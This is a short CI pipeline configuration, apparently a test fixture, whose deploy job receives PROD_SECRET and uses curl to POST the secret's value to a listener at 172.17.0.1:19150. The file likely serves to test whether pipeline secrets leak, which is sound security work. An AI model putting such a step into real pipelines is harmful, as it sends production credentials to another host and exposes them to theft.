shared:
  image: node:18
jobs:
  main:
    requires: [~pr, ~commit]
    steps:
      - hello: echo "main job ran"
  deploy:
    requires: [main]
    secrets:
      - PROD_SECRET
    steps:
      - show: curl -s -X POST --data "deploy-job-secret=[$PROD_SECRET]" http://172.17.0.1:19150/ || true